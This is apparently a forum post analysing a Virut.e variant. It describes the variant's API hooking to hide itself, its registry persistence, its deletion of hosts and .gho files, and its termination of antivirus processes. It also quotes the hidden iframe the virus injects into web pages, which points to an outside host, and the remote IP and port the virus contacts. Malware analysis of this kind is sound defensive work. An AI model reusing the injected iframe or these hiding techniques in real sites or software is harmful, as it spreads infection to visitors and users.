今天从某个网友那里获得了一个病毒 据说是感染文件的 卡巴报为Virus.Win32.Virut.e(瑞星还不能查杀)
看病毒名估计是一个新的感染exe系列的变种
病毒文件名 VT100.exe
病毒大小 125952字节
MD5 35703ea7c752d959d2e9d904654a5522
编写语言 Delphi
此病毒特征:1.感染exe(包括系统分区)html htm php asp aspx 文件
2.结束一些杀毒软件进程
3.删除hosts文件
4.通过hook API函数 隐藏进程 隐藏文件自身及注册表中的启动项目
5.删除gho文件
总体上来看有点步李俊的后尘哦!
运行文件后
生成如下文件
C:\Windows\system32\VT100.exe
Hook 以下API函数Ntcreatefile
Ntcreateprocess
NtcreateprocessEx
NtEnumerateValueKey
NtQueryDirectoryFile
NtQuerySystemInformation
ZwCreateFile
ZwCreateprocess
ZwCreateprocessEx
ZwEnumerateValueKey
ZwOpenFile
ZwQueryDirectoryFile
使得C:\Windows\system32\VT100.exe在资源管理器下不可见
其进程在任务管理器中也不可见
后面提到的启动项目 在注册表编辑器中也不可见
注册表方面
添加HKLM\SOFTWARE\Microsoft\Tracing\FWCFG键
并在其下建立值
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize: 0x00100000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory: "%windir%\tracing"
用意不懂 不过感觉应该和不断的停止防火墙的程序有关
我的瑞星防火墙就是被他不断的停止...
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面增加名称为VT100 Emulator的键值
指向 C:\Windows\system32\VT100.exe达到开机自启动的目的
删除C:\WINDOWS\system32\drivers\etc\hosts
和gho文件
如果有如下进程则结束
sfmantec antipirus(作者拼错了吧?呵呵)
ravmon.exe
zonealarm
rav_onclass
感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的exe文件
使得被感染文件增加9728字节的内容
感染感染系统分区 (包括C:\WINDOWS\system32\dllcache\下面的文件)及其他分区的html htm php asp aspx 文件
在其内部添加如下代码
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
通过winlogon进程访问81.95.149.98:65520 可没找到插入winlogon的 dll ..
